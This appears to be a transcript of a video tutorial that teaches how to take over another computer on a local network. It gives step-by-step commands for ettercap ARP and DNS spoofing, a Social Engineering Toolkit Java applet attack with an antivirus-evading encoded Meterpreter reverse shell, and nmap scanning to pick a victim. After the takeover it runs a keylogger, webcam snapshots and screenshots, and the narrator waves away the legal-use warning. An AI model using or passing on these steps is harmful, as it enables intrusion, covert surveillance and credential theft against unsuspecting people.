Hello everyone, today I'm going to be teaching you how to gain remote access on another computer that's on your network. This is relatively simple to do and just takes a little bit of setting up. You're going to need BackTrack 5 R1 and that's it. And let's get started, shall we? First we're going to need to download EtherCap. You can type this by opening up a terminal and typing apt-get install EtherCap. I already installed it, but once you install it, then we need to edit the config file, the ether.dns file, which enables us to select which website we want to redirect the host to. Let's do this. Type in gedit user local share ethercap ether.dns. Excellent. Alright, now what we want to do is scroll down to the bottom. And at the bottom here, we want to type in an asterisk to redirect all websites, capital A, and you want to put your IP address here, your IP address. Now, my IP address is 192.168.0.199, okay, and that's what you want to find out your own IP address, and it's not too hard. So I'm 199. Now we save, and we can exit. Excellent. Now what we need to do is we need to set up the social engineering toolkit. Let's change directory there. You want to type this in. Now you want to do /set. Open this up. Now yours will look a little bit different because mine's already the updated one, but you would have more options and you want to select the one that says update the social engineer toolkit. So you do that, updating, and then it will finish. Now, this is important. After you update, you want to exit. So, exit. And then you re-execute the social engineering toolkit. Now, the second time you re-execute it, it's going to ask you, please use this for legal purposes, blah, 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 blah. You just press yes, and then push enter, or do whatever it tells you to do. Now we're back here. We need to upload the Metasploit framework by pressing 4, enter. Be patient, wait for this thing to update. This won't take long. You want to make sure you update the Metasploit framework like every so often. That will be important. Let's just be patient here. Anyways, alright, here we go. Alright, we're ready. We're gonna set up the attack now. Oh, actually, wait, there's one more thing we need to do. We need to configure social engineering toolkit to use the Apache web server, which will make things go a lot faster. Alright, pay close attention now. This is what the file will look like, and I'm going to highlight what we need to change. Just keep scrolling down till you see this right here. Use Apache instead of standard Python web servers. This will increase speed of the attack vector. You want to make sure this is on. On. Yours will say off. You got to make it on. Alright, once that's done, you just click save. Now we are good to go. Okay, 1. Alright, now we do 2 for the website attack vector. We do 1 for the Java applet. 1 for the web templates. Don't worry about this. This is a certain option that I had on, and you don't really need to worry about this because Social Engineering Toolkit will do it for you. Now you're going to do number 1 for the Java required, and it's going to do this. This is another important one. You want to make sure you press 13 for the shellcode exec alphanumeric shellcode. This makes sure that the antivirus can't detect the payload we're going to be running on their computer. Port for the listener is 443. Press 1 for the interpreter reverse TCP, and this is the part where we wait for a long time. Let me just explain to you what the attack is going to do. You're probably wondering. So, what we're going to do is we're setting up our own little website on our computer, our own web server. And what this website looks like is, it just says Java required. You need to press run when the Java pop-up comes up. And what happens is when a person goes to this website, they're going to see this thing that says, this is a secure Java applet. Do you want to run this or not? Yes or no. When they click yes, then we pretty much get remote access to their computer. If they click no, well, they're going to not have a choice because the pop-up's going to keep on coming up. And remember, all their websites are going to be redirected to our web server where it says Java required. So essentially, anyone who is not technologically savvy, they would fall for this, and it's pretty much a guaranteed compromise. Pop the box in any case. Alright, it's gonna say this because Apache's not on. Just all you have to do is just click yes, say yes, and there we go. Now it's gonna load the MSF listener where we're going to receive the remote connection when the victim presses run on their computer. So here we are. We're just gonna wait a little bit for this to load up. You're also gonna want to know the victim you're attacking. You want to know their IP address. That's not too hard to do. If you know how to use Nmap, you can find out which IP address their victim is. I'll show you how to do that in a little bit after this thing loads up. Meanwhile, we're going to open up a new terminal or a new tab, and I'll show you how to use Nmap to do this. Hold up. Okay. We're going to type in nmap-sn. You're going to type in your gateway IP address, and if you don't know what your gateway IP address is, just walk to your router and turn it over and find out what it is. Or an easier way, you just type route. There you go, gateway. Voila, right there. Nmap sn -sn 192.168.1. You do a /24 because most networks are a Class C network. Click enter, and this will show us all the hosts that are connected to that network, and we can select our victim from there. Anyways, this thing is all loaded up now, so we're good to go. Right here, let's just see who our victim is going to be. Excellent, look at all these people that are connected to my network. We can select our victim here. Very cool. Alright. My victim in this case is going to be 192.168.0.194. All these other guys are other different people, but this is the one we're particularly interested in. So we'll copy this, and we can exit out of this. Alright, now that we know our victim, we are ready to start our DNS spoofing. So let's do this. We're going to do the ethercap-t-i.wlan1. See, my interface is called WLAN1, yours is probably WLAN0. If you run into any problems with this, just give me a PM, but you can usually find out by typing ifconfig. So let me just show you real quick. Ifconfig, there you go. See, mine is WLAN1, tells you the address. WLAN0 is my laptop wireless interface, but I have an external wireless interface that's WLAN1. I use that instead. So that's how to find out which one you have. So WLAN1, Q for quiet mode, M, ARP remote. Your IP address of the gateway goes right here, and the IP address of your victim, which I will paste. Now, capital P, DNS spoof. Hit enter. There we go. Now the magic can happen. Now, all we need to do is wait for the victim to browse to any website, and they will be led to the Java required. Now, unfortunately, I cannot show that happening to you. Holy moly. Looks like it's happening already. Excellent. Okay. We're going to the internet, and as you see, we can already see stuff being DNS spoofed to me. I'm gonna open up a web page on the computer that I have next to me, and I'm gonna have it's gonna get spoofed to that particular Java see that youtube.com, that's the one I visited, and it's going to be spoofed to this one right here. So on my Windows computer, I can see the Java template, and if you just do this tutorial, you can see it too. It's going to say Java pop-up comes up, you want to click run, and watch, right when you click run, we're going to get something good right over here. So I'm going to click run on that computer. There you go, sending stage. This is it's sending, there we go, interpreter session open. Right when this comes, we want to quickly do sessions-i1. Hold up. Sessions-i1. Starting interaction with 1. Okay, now what you want to do is in this interpreter show, you want to type in PS. This will show all the running processes on the host computer. You want to find explorer.exe right here, explorer.exe 5088. Excellent. 5088. So you want to type in migrate 5088. so it migrates to explorer.x and the process won't be killed. You just wait till it migrates. It takes a little bit of time. Migration completed successfully. Now you pretty much, this is like the golden thing of, you can do whatever you want. You can have fun, you do whatever, you type in help, you see all the stuff that you can do. Let's see, commands, you can look through here, but let me just show you some neat stuff. Let's do something neat right now. Let's run a keylogger, shall we? Alright, let's type in keyscan_start. Now let's type something in on the victim computer. Alright, now let's do keyscan dump. Oh my gosh, look at that. You can see whatever they want. That's cool. And keyscan stop to stop the keystroke sniffer. Also, if you want to be a creeper, you can do webcam snap. Let's see, what's the actual command? Yeah, webcam snap. We'll take a picture of the actual. We'll take a picture to the webcam and send it to you. So I'm going to do that, and I'm going to take a picture of my world history textbook. Let's do that, shall we? Excellent. That is my world history textbook, and I hate it, but there you go. You can also see the screen that they have. You can do that. Let's see, what's the command? Screenshot. There we go.